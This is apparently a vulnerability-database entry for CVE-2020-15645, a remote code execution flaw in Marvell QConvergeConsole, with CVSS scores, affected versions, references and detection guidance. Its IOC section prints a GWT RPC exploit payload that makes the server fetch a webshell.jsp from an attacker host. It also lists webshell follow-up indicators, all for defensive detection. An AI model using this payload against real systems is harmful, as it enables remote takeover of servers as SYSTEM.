CVE-2020-15645
published 2020-08-25CVE-2020-15645: This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is…
PriorityP267high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
10.68%
95.3th percentile
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Marvell QConvergeConsole 5.5.0.64. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the getFileFromURL method of the GWTTestServiceImpl class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-10553.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| marvell | qconvergeconsole | < 5.5.00.73 | 5.5.00.73 |
| marvell | qconvergeconsole | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command7|0|7|http://:8080/QConvergeConsole/com.qlogic.qms.hba.gwt.Main/|serialization_policy|com.qlogic.qms.hba.gwt.client.GWTTestService|getFileFromURL|java.lang.String/2004016611|Z|http://:8000/webshell.jsp|1|2|3|4|2|5|6|7|0|↗
- →Detect HTTP POST requests to the GWT RPC endpoint /QConvergeConsole/com.qlogic.qms.hba.gwt.Main/gwttestservice with Content-Type 'text/x-gwt-rpc' containing the string 'getFileFromURL' in the body, indicating exploitation of CVE-2020-15645. ↗
- →Alert on HTTP GET requests to /QConvergeConsole/webshell.jsp with a 'cmd' query parameter, indicating post-exploitation webshell execution. ↗
- →Monitor for the creation of .jsp files in the QConvergeConsole web application context path (e.g., QCCAgentInstallers directory), which may indicate a malicious JSP webshell was uploaded via the getFileFromURL method. ↗
- →The exploit bypasses the flawed URL restriction: the vulnerable code blocks URLs containing 'download.qlogic.com' instead of allowing only that domain, so any attacker-controlled URL not containing that string will be accepted. ↗
- →Detect GWT RPC payloads referencing 'com.qlogic.qms.hba.gwt.client.GWTTestService' with method 'getFileFromURL' or 'deleteAppFile' in HTTP POST bodies to the gwttestservice endpoint. ↗
- →Process execution as 'nt authority\system' spawned from the QConvergeConsole web application process may indicate successful webshell execution following exploitation. ↗
- ·The vulnerable getFileFromURL method contains a logic inversion: it blocks URLs containing 'download.qlogic.com' rather than restricting to only that domain, meaning any external attacker-controlled URL is accepted. Detection rules should not rely on the presence of 'download.qlogic.com' in the request body as an indicator of benign traffic. ↗
- ·Authentication is required to exploit this vulnerability, but the existing authentication mechanism can be bypassed, meaning standard authenticated-only network controls are insufficient to prevent exploitation. ↗
- ·Successful exploitation results in code execution as SYSTEM (Windows) or root (Linux), so any process or file activity from the QConvergeConsole service account should be treated as high-severity. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv3.08.8HIGHCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
https://www.marvell.com/content/dam/marvell/en/public-collateral/fibre-channel/marvell-fibre-channel-security-advisory-2020-07.pdfhttps://www.tenable.com/security/research/tra-2020-56https://www.zerodayinitiative.com/advisories/ZDI-20-973/https://www.marvell.com/content/dam/marvell/en/public-collateral/fibre-channel/marvell-fibre-channel-security-advisory-2020-07.pdfhttps://www.tenable.com/security/research/tra-2020-56https://www.zerodayinitiative.com/advisories/ZDI-20-973/
2020-08-25
Published